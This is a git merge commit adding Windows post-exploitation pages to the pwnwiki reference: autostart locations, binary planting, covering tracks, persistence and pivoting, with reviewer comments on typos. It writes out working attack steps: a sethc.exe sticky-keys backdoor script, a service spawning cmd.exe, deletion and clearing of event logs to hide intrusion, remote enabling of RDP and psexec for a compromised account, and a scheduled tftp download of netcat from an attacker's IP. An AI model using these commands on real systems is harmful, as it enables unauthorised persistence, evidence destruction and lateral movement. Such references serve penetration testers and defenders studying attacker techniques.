Merge pull request #54 from pwnwiki/ames_content

Linking fixes, content fixes and content addition - Ames
Rob Fuller 2013-12-29 07:56:06 -08:00
commit 8c04d9e203
7 changed files with 274 additions and 6 deletions


@ -0,0 +1,94 @@
## Windows Autostart Locations
### Folders
| Location | Operating System |
| -------- | ---------------- |
| `%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\` | Windows NT 6.0, 6.1 |
| `%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\` | Windows 5.0, 5.1, 5.2 |
| `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` | Windows 9x |
| `%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\` | Windows NT 3.50, 3.51, 4.0 |
| `User\Startup\` | |
| `%windir%\Start Menu\Programs\Startup\` | |
| `%windir%\Tasks\` | |
| `%windir%\system\iosubsys\` | |
| `%windir%\system\vmm32\` | |
### Files
| Location | Operating System |
| -------- | ---------------- |
| `%windir%\dosstart.bat` | |
| `%windir%\system.ini` - [boot] "scrnsave.exe" | |
| `%windir%\system.ini` - [boot] "shell" | |
| `%windir%\system\autoexec.nt` | |
| `%windir%\system\config.nt` | |
| `%windir%\win.ini` - [windows] "load" | |
| `%windir%\win.ini` - [windows] "run" | |
| `%windir%\wininit.ini` | |
| `%windir%\winstart.bat` | |
| `c:\autoexec.bat` | |
| `c:\config.sys` | |
| `c:\explorer.exe` | |
### Registry
| Location | Function |
| -------- | -------- |
| `%windir%\dosstart.bat` | |
| `HKEY_CLASSES_ROOT\batfile\shell\open\command\` | Executed whenever a .BAT file (Batch Command) is run. |
| `HKEY_CLASSES_ROOT\comfile\shell\open\command\` | Executed whenever a .COM file (Command) is run. |
| `HKEY_CLASSES_ROOT\exefile\shell\open\command\` | Executed whenever a .EXE file (Executable) is run. |
| `HKEY_CLASSES_ROOT\jsefile\shell\open\command\` | Executed whenever a .JSE file (Encoded Javascript) is run. |
| `HKEY_CLASSES_ROOT\jsfile\shell\open\command\` | Executed whenever a .JS file (Javascript) is run. |
| `HKEY_CLASSES_ROOT\piffile\shell\open\command\` | Executed whenever a .PIF file (Portable Interchange Format) is run. |
| `HKEY_CLASSES_ROOT\scrfile\shell\open\command\` | Executed whenever a .SCR file (Screen Saver) is run. |
| `HKEY_CLASSES_ROOT\vbefile\shell\open\command\` | Executed whenever a .VBE file (Encoded Visual Basic Script) is run. |
| `HKEY_CLASSES_ROOT\vbsfile\shell\open\command\` | Executed whenever a .VBS file (Visual Basic Script) is run. |
| `HKEY_CLASSES_ROOT\wsffile\shell\open\command\` | Executed whenever a .WSF file (Windows Scripting File) is run. |
| `HKEY_CLASSES_ROOT\wshfile\shell\open\command\` | Executed whenever a .WSH file (Windows Scripting Host) is run. |
| `HKEY_CURRENT_USER\Control Panel\Desktop` | The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load` | Executed when the user logs in. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run` | Executed when the user logs in. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\` | Used only by Setup. Displays a progress dialog box as the keys are run one at a time. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\` | All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit` | Executed when a user logs in. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon` | The "Shell" value is monitored. This value is executed after you log in. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\` | All values in this key are executed as services, and then their autostart reference is deleted. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\` | All values in this key are executed as services. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\` | Executed by explorer.exe as soon as it has loaded. |
| `HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline` | Executed when a 16-bit Windows executable is executed. |
| `HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline` | Executed when a 16-bit DOS application is executed. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` | The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\` | All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\` | Layered Service Providers, executed before user login. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\` | Services marked to startup automatically are executed before user login. |
| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | Similar to the RunOnce key from HKEY_CURRENT_USER. |
| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\` | Similar to the Run key from HKEY_CURRENT_USER. |
## Windows Operating System Versions
From http://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx:
The following table summarizes the most recent operating system version numbers.
| Operating system | Version number |
| ---------------- | -------------- |
| Windows 8.1 | 6.3 |
| Windows Server 2012 R2 | 6.3 |
| Windows 8 | 6.2 |
| Windows Server 2012 | 6.2 |
| Windows 7 | 6.1 |
| Windows Server 2008 R2 | 6.1 |
| Windows Server 2008 | 6.0 |
| Windows Vista | 6.0 |
| Windows Server 2003 R2 | 5.2 |
| Windows Server 2003 | 5.2 |
| Windows XP 64-Bit Edition | 5.2 |
| Windows XP | 5.1 |
| Windows 2000 | 5.0 |
## References
A large portion of this content came from https://web.archive.org/web/20110203184210/http://www.easy-data.no/Autostart.html
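Review bot: the Registry table carries a stray `%windir%\dosstart.bat` row with an empty Function cell; it is a file path, already listed in the Files table, and should be dropped from the Registry table. Two other rows look mangled: `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` under Windows 9x (`wmiOWS` is not a Windows directory name and reads like a corrupted `WINDOWS`) and the Winsock2 path, which has a stray space inside `Catalog_Entries`. The Operating System column is empty for most Folders and Files rows; filling it in, or dropping the column, would make those tables consistent with the version table in the same file.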


@ -0,0 +1,11 @@
# Windows Binary Planting
Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
| Command | Description / Importance |
| ------- | ------------------------ |
| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |
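Review bot: in the sethc batch script, the line `cmd %SYSTEMROOT%\System32\cmdsys\ > nul` does not create the `cmdsys` directory that the following `copy` lines write into (the preceding `if exist ... rd` line has just removed it), so `md` appears to be intended; the `copy` lines also pass `/y` twice. The `c: > nul\\cd\ > nul\\` fragment reads like lost line breaks where the rest of the script uses `<br>`. Prose fixes: "putting binary is a specific place" should be "putting a binary in a specific place", and "a installer calles" should be "an installer calls". The first column is headed Command, but the first row is a directory path, so Location or Command / Path would fit the contents better.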


@ -0,0 +1,74 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Windows Covering Tracks Commands
Commands to run to clean up a system after you have exploited it and to reduce a target's ability to discover what you did while on their system and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
## del
### Delete Logs
* **Command with arguments**: `del %WINDIR%\*.log /a /s /q /f`
* **Description**: **MUST be run as an administrator**. Deletes all *.log files from the %WINDIR% directory.
* **Output**:
* NA
----
## wevtutil
### List Logs
* **Command with arguments**: `wevutil el`
* **Description**: Lists the different log files the system is keeping. More information can be found http://technet.microsoft.com/en-us/library/cc732848(WS.10).aspx
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>C:\Users\johndoe>wevtutil el
Application
DFS Replication
Directory Service
DNS Server
File Replication Service
HardwareEvents
Internet Explorer
Key Management Service
Security
System
ThinPrint Diagnostics
EndpointMapper
ForwardedEvents
Microsoft-Windows-ADSI/Debug
Microsoft-Windows-Bits-Client/Analytic
Microsoft-Windows-Bits-Client/Operational
Microsoft-Windows-CAPI2/Operational
Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational
Microsoft-Windows-CodeIntegrity/Operational
Microsoft-Windows-CodeIntegrity/Verbose
Microsoft-Windows-COM/Analytic
Microsoft-Windows-CorruptedFileRecovery-Client/Operational
Microsoft-Windows-CorruptedFileRecovery-Server/Operational
Microsoft-Windows-CredUI/Diagnostic
Microsoft-Windows-DateTimeControlPanel/Analytic
Microsoft-Windows-DateTimeControlPanel/Debug
Microsoft-Windows-DateTimeControlPanel/Operational
Microsoft-Windows-DCLocator/Debug
Microsoft-Windows-Diagnosis-DPS/Analytic
Microsoft-Windows-Diagnosis-DPS/Debug
Microsoft-Windows-Diagnosis-DPS/Operational
Microsoft-Windows-Diagnosis-MSDT/Debug
Microsoft-Windows-Diagnosis-MSDT/Operational
Microsoft-Windows-Diagnosis-PLA/Debug
Microsoft-Windows-Diagnosis-PLA/Operational
Microsoft-Windows-Diagnosis-WDI/Debug
Microsoft-Windows-Diagnostics-Networking/Debug
[...snip...]</code></div>
### Clear Logs
* **Command with arguments**: `wevtutil cl [LOGNAME]`
* **Description**: **MUST be run as an administrator**. Clears the contents of a specific log.
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>c:\temp>wevtutil cl Microsoft-Windows-EventLog/Debug</code></div>
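Review bot: the List Logs command is given as `wevutil el`, but the tool is `wevtutil` (the captured output directly below uses the correct name), so the command as written fails as an unrecognised command. The `Output: * NA` bullet under del would read better as `Output: none`. The inline jQuery collapse script at the top of the file assumes the wiki theme already loads jQuery; if it does not, the `div.view` blocks simply render expanded, which is harmless but worth a comment in the file.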


@ -0,0 +1,76 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Windows General Persistence Commands
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
### Enable `psexec`
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
``c:\> net use \\[TargetIP]\ipc$ username /user:password
c:\> sc \\[TargetIP] config netdde start= auto
c:\> sc \\[TargetIP] config netddedsdm start= auto
c:\> sc \\[TargetIP] config clipsrv start= auto
c:\> sc \\[TargetIP] start netdde
c:\> sc \\[TargetIP] start netddedsdm
c:\> sc \\[TargetIP] start clipsrv
``
### Enable Remote Desktop
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
<pre>
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights] [Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
</pre>
1. Create another file named `enable_ts.reg` containing the contents below.
<pre>
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
</pre>
1. On the remote system, execute the following commands:
``c:\> sc config termservice start= auto sc config termservice start= auto
c:\> regedit /s enable_ts.reg
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
c:\> gpupdate /Force
c:\> net start "terminal services"
``
### Scheduler
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
``c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command
``
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
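Review bot: the `net use` line in the Enable psexec block reverses the argument order: `net use \\[TargetIP]\ipc$ username /user:password` passes the username where the password belongs, whereas the Scheduler block has it the right way round (`net use \\[TargetIP]\ipc$ password /user:username`). The three command blocks open and close with double backticks, which markdown does not treat as a fence, so they render as run-together inline code; triple backticks are needed. Two lines also carry duplicated text: `[Privilege Rights] [Privilege Rights]` in fix_ts_policy.ini and `sc config termservice start= auto sc config termservice start= auto` in the command list. The collapse script copied from cover.md is unused here, since this file has no `div.slide` or `div.view` elements.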


@ -0,0 +1,8 @@
# Windows Persistence Commands
Commands that help you maintain control over a compromised system.
* [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot.
* [Binary Planting](binary.md) - Putting binary files in certain places.
* [Covering Tracks](cover.md) - Covering your tracks.
* [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.
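Review bot: the General Commands entry reads "Commands your could/should use"; "your" should be "you". The Autostart Locations description, "Where are the locations that will cause some command to auto-start on boot", is a question fragment; "Locations that cause a command to run automatically at boot or logon" reads cleaner and also covers the logon-time keys the linked page lists.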

pivoting/windows/index.md Executable file

@ -0,0 +1,6 @@
# Windows Pivoting Commands
Commands that help you pivot to other systems from a compromised system.
* [Networking Commands](windows_cmd_network.md) - Gathering system information about network interfaces and such.
* [Remote Movement](remote.md) - Commands that move data and files between systems on a network.
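Review bot: the Networking Commands link points at `windows_cmd_network.md` relative to pivoting/windows/, while the presence index in this same commit also links to a `windows_cmd_network.md` relative to its own directory; unless the file is duplicated, one of the two relative links will not resolve, so both should point at a single copy.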


@ -1,8 +1,7 @@
# Windows CMD Commands # Windows Presence Commands
Command that can be executed from the context of the CMD.exe prompt. Command that can be executed from the context of the CMD.exe prompt that help gain insight into the configuration of the target.
* [Config Commands](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
* [Network Commands](windows_cmd_network.md) - Commands used for gathering information about the network settings and connections of a system.
* [Remote Acccess Commands](windows_cmd_remote.md) - Commands to remotely administer systems.
* [Blind Files](blind.md) - Files to look for on the system.
* [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
* [Finding Files](find_files.md) - How to search for files.
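Review bot: the new list has two entries for the same page, `[Config Commands](windows_cmd_config.md)` and `[Config](windows_cmd_config.md)`, with an identical description, so one should be removed. `Remote Acccess Commands` has a typo (Access). The diff also shows the old and new title and intro run together on one line ("# Windows CMD Commands # Windows Presence Commands"); that is how this page renders a changed line, but it is worth confirming the file itself carries only the new title and intro.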